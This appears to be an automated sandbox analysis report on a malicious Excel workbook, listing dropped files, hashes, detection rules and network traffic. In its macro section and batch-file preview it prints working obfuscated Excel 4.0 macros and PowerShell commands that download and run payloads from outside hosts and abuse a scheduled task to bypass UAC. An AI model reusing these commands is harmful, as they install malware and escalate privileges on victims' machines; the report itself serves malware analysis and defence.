Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2YWU3VZ5KQ7YGZJ3GJV8.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5877382331325665
Encrypted:	false
SSDEEP:	96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
MD5:	88AF443197F04FC07F6BE051B7084403
SHA1:	AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
SHA-256:	24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
SHA-512:	D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PUV6Q5QUWPCDRN1NU16Z.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5877382331325665
Encrypted:	false
SSDEEP:	96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
MD5:	88AF443197F04FC07F6BE051B7084403
SHA1:	AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
SHA-256:	24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
SHA-512:	D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QWQLK7LNYAZINNN1XM4E.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5877382331325665
Encrypted:	false
SSDEEP:	96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
MD5:	88AF443197F04FC07F6BE051B7084403
SHA1:	AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
SHA-256:	24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
SHA-512:	D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R38BWSSJ7G62VJURDECV.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5877382331325665
Encrypted:	false
SSDEEP:	96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
MD5:	88AF443197F04FC07F6BE051B7084403
SHA1:	AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
SHA-256:	24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
SHA-512:	D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RIK1BAD7SBY1C0IHKYVN.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5877382331325665
Encrypted:	false
SSDEEP:	96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
MD5:	88AF443197F04FC07F6BE051B7084403
SHA1:	AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
SHA-256:	24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
SHA-512:	D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\axoikBEWgDCn.exe Download File
Process:	C:\Users\user\AppData\Roaming\sb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3485696
Entropy (8bit):	7.9448188580379755
Encrypted:	false
SSDEEP:	98304:w1oluFwZls+JDRmvEYCrSEebiRi0LrU3By8HnYeCP:w1ocFwZls+JD4vlC6L8r2By8HYe
MD5:	1C1BDD57483BBFBB497B4596BE12B053
SHA1:	C7DB6BBAEC3DD6C44EA291185A186489B74D7EF7
SHA-256:	22DBE6172D32B9B90D66036688E440A9026524F8C4C61B1C05F45DBD63919483
SHA-512:	4A6AB3501A484BF4F73A2E237B80A7BA812F7CD2AA84E8BFB92E075A441AB3A4663039C64F563A84663C6EEEBCFAAD7AE7E0158893106B827088C283E046A627
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............0...5..........85.. ...@5...@.. ........................5...........@.................................`85.O....@5......................`5...................................................... ............... ..H............text.....5.. ....5................. ..`.rsrc........@5.......5.............@..@.reloc.......`5.......5.............@..B.................85.....H....... ]...C......e........4.........................................^..}.....(.......(.........0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o .....(......{.....o!.....{....o"...."...Bs#...o$...&.{....o"...."...Bs#...o$...&.{....o%....{......o&.....{....o%....{......o&.....{....o%....{......o&.....{....o%....{......o&.....{....o

C:\Users\user\AppData\Roaming\sb.exe Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3485696
Entropy (8bit):	7.9448188580379755
Encrypted:	false
SSDEEP:	98304:w1oluFwZls+JDRmvEYCrSEebiRi0LrU3By8HnYeCP:w1ocFwZls+JD4vlC6L8r2By8HYe
MD5:	1C1BDD57483BBFBB497B4596BE12B053
SHA1:	C7DB6BBAEC3DD6C44EA291185A186489B74D7EF7
SHA-256:	22DBE6172D32B9B90D66036688E440A9026524F8C4C61B1C05F45DBD63919483
SHA-512:	4A6AB3501A484BF4F73A2E237B80A7BA812F7CD2AA84E8BFB92E075A441AB3A4663039C64F563A84663C6EEEBCFAAD7AE7E0158893106B827088C283E046A627
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............0...5..........85.. ...@5...@.. ........................5...........@.................................`85.O....@5......................`5...................................................... ............... ..H............text.....5.. ....5................. ..`.rsrc........@5.......5.............@..@.reloc.......`5.......5.............@..B.................85.....H....... ]...C......e........4.........................................^..}.....(.......(.........0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o .....(......{.....o!.....{....o"...."...Bs#...o$...&.{....o"...."...Bs#...o$...&.{....o%....{......o&.....{....o%....{......o&.....{....o%....{......o&.....{....o%....{......o&.....{....o

C:\Users\user\Desktop\66EE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	266808
Entropy (8bit):	7.549980080268811
Encrypted:	false
SSDEEP:	6144:nk3hbdlylKsgqopeJBWhZFVE+W2NdAIv9DQokMufSR1f8f3BsgaINVQTB9GccQa8:IFDQxtfSHfmBgWOT3VaZK
MD5:	AFEF418E4C39AF2C5FFF34A15166CF88
SHA1:	C9CA7EF1C1CA8FF2CB3FCECF3583020554AD6E9E
SHA-256:	02403C4922BE12C6D388F91D7D3E7F74245705E57652285D22D143162436A0D3
SHA-512:	374FE32BB097C309262FEC154EA71DCF5A1FC6661056FB4BF72DDFBDE5C2319BC62E2390EB48C60CC7665B7C24DD9274413878349BBA47D009F15FB2DB513B6D
Malicious:	false
Preview:	........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6..

C:\Users\user\Documents\pd.bat Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	2390
Entropy (8bit):	5.443448049989016
Encrypted:	false
SSDEEP:	48:dnjA3U3jRVDIdC/7vUU3jRVDIdC/7vQU3jRVDIdC/7vaVDIdPN:dnM3U3b/QU3b/kU3b/J
MD5:	67C6913705E0A631FF9A2F6F4A9BF544
SHA1:	3BBE7C75091184A531A66FE34BE658FE5A4CB238
SHA-256:	43B269B66277C13801C8E20D5D3ED41B28F037F6EFBEFB5DBEBCF26B67BB96EA
SHA-512:	A24C4EC00666392DDAF3A980EDE55C0D8C58A205010BA63DDB7AA5E636B8C696B53416F4649A443030C1B960E007F61582F162AA9BC12EE7C16E2CBD9360EE05
Malicious:	true
Yara Hits:	Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: C:\Users\user\Documents\pd.bat, Author: Florian Roth Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: C:\Users\user\Documents\pd.bat, Author: Joe Security
Preview:	mode 18,1..color FE..setlocal..for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j..if "%version%" == "10.0" ( echo "Windows 10 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.bat');Start-Sleep 2; Start-Process $env:appdata\ok.bat; Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;&REM " >nul..timeout /t 2 >nul..schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul..timeout /t 3 >nul..reg delete "HKCU\Environment" /v "windir" /F..)..if "%version%" == "6.3" ( echo "Windows 8.1 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appd

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: blobijump, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Jan 3 23:14:32 2021, Security: 1
Entropy (8bit):	7.743334515470374
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	spetsifikatsiya.xls
File size:	234496
MD5:	bf9774e5063791aba95abb5b808aea43
SHA1:	2774db354121fd9080d86623e8e854af967b14cf
SHA256:	bcac1e33956458b61bbc185ad3861e385f863ec9bb9232e67eea95282929ce30
SHA512:	52325d089df867775b5498bf4aeb032a5199fc22f4532b44ddef14c6dbb9019ee44284b8e63e89fad42ea24a4177805a644b41aa825e2c90711c7da7f6d4113b
SSDEEP:	6144:cnSGiysRchNXHfA1MiWhZFVEld+Dr7rIHtjQA7MOfSRFvkf3ysQaoNVwTpNGc8ik:BNjQaNfS3veyQ2eTXrS7
File Content Preview:	........................;......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "spetsifikatsiya.xls"

Indicators
Has Summary Info:	True
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Last Saved By:	blobijump
Create Time:	2020-09-20 21:17:44
Last Saved Time:	2021-01-03 23:14:32
Security:	1

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	276
Entropy:	3.16930549839
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	156
Entropy:	3.29938329109
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . b l o b i j u m p . . . @ . . . . L . z . . . . @ . . . . . n 1 & . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 62 6c 6f 62 69 6a 75 6d 70 00 00 00 40 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 230144

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	230144
Entropy:	7.77909423419
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . b l o b i j u m p B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 09 00 00 62 6c 6f 62 69 6a 75 6d 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

;;;;;;;112;;;;;;"=GET.CELL(5;L581)";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item """"pd""&CHAR(46)&""bat"""" -Destination """"$e`nV:T`EMP"""""")";;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd""&CHAR(46)&""bat -Force"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd""&CHAR(46)&""bat"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd""&CHAR(46)&""bat"""""")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Down'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/4jsSu5Q','pd""&CHAR(46)&""bat')"")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2021 10:06:37.203154087 CET	49167	443	192.168.2.22	104.22.0.232
Jan 5, 2021 10:06:37.243231058 CET	443	49167	104.22.0.232	192.168.2.22
Jan 5, 2021 10:06:37.243443012 CET	49167	443	192.168.2.22	104.22.0.232
Jan 5, 2021 10:06:37.256114006 CET	49167	443	192.168.2.22	104.22.0.232
Jan 5, 2021 10:06:37.296238899 CET	443	49167	104.22.0.232	192.168.2.22
Jan 5, 2021 10:06:37.300632000 CET	443	49167	104.22.0.232	192.168.2.22
Jan 5, 2021 10:06:37.300725937 CET	443	49167	104.22.0.232	192.168.2.22
Jan 5, 2021 10:06:37.300777912 CET	443	49167	104.22.0.232	192.168.2.22
Jan 5, 2021 10:06:37.300798893 CET	49167	443	192.168.2.22	104.22.0.232
Jan 5, 2021 10:06:37.317473888 CET	49167	443	192.168.2.22	104.22.0.232
Jan 5, 2021 10:06:37.357554913 CET	443	49167	104.22.0.232	192.168.2.22
Jan 5, 2021 10:06:37.357705116 CET	443	49167	104.22.0.232	192.168.2.22
Jan 5, 2021 10:06:37.565538883 CET	49167	443	192.168.2.22	104.22.0.232
Jan 5, 2021 10:06:37.604422092 CET	443	49167	104.22.0.232	192.168.2.22
Jan 5, 2021 10:06:37.604573011 CET	49167	443	192.168.2.22	104.22.0.232
Jan 5, 2021 10:06:38.881004095 CET	49167	443	192.168.2.22	104.22.0.232
Jan 5, 2021 10:06:38.921164989 CET	443	49167	104.22.0.232	192.168.2.22
Jan 5, 2021 10:06:39.036650896 CET	443	49167	104.22.0.232	192.168.2.22
Jan 5, 2021 10:06:39.036705971 CET	443	49167	104.22.0.232	192.168.2.22
Jan 5, 2021 10:06:39.036986113 CET	49167	443	192.168.2.22	104.22.0.232
Jan 5, 2021 10:06:39.040473938 CET	49169	80	192.168.2.22	37.46.150.139
Jan 5, 2021 10:06:39.087682962 CET	80	49169	37.46.150.139	192.168.2.22
Jan 5, 2021 10:06:39.087904930 CET	49169	80	192.168.2.22	37.46.150.139
Jan 5, 2021 10:06:39.088344097 CET	49169	80	192.168.2.22	37.46.150.139
Jan 5, 2021 10:06:39.137165070 CET	80	49169	37.46.150.139	192.168.2.22
Jan 5, 2021 10:06:39.137238026 CET	80	49169	37.46.150.139	192.168.2.22
Jan 5, 2021 10:06:39.137267113 CET	80	49169	37.46.150.139	192.168.2.22
Jan 5, 2021 10:06:39.139713049 CET	49169	80	192.168.2.22	37.46.150.139
Jan 5, 2021 10:06:39.344322920 CET	49169	80	192.168.2.22	37.46.150.139
Jan 5, 2021 10:06:39.470077991 CET	49167	443	192.168.2.22	104.22.0.232
Jan 5, 2021 10:06:39.470149040 CET	49169	80	192.168.2.22	37.46.150.139
Jan 5, 2021 10:06:47.839543104 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:47.915848970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:47.915924072 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:47.916533947 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:47.992923021 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:47.998641968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:47.998667955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:47.998748064 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:47.998933077 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:47.998955965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:47.999006987 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:47.999157906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:47.999178886 CET	80	49170	79.124.76.20	192.168.2.22
